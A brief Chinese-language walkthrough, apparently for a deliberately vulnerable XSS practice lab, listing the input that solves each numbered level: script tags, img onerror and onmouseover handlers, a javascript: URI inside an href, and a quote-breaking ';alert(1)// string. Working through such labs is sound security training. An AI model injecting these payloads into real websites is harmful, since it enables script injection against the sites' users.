第一题:反射性xss(get)
输出的字符出现在url中
第二题:反射性xss(post)
登录后输入<script>alert(1)</script>
第三题:存储型xss
输入<img src=http://1.html onerror=alert(1)>
第四,五题:domxss:
输入:'><img src="#" onmouseover="alert('xss')">
第七题:
输入:<img src=0+onerror="alert(123)">
第八题:xss之htmlspecialchars
审查元素后发现输入的内容是被拼接在<a href ="输入的内容">中
输入:javascript:alert(1)
第九题:xss之href输出
第十题:
输入:';alert(1)//
来源:https://www.cnblogs.com/gudexiao-1996/p/11685246.html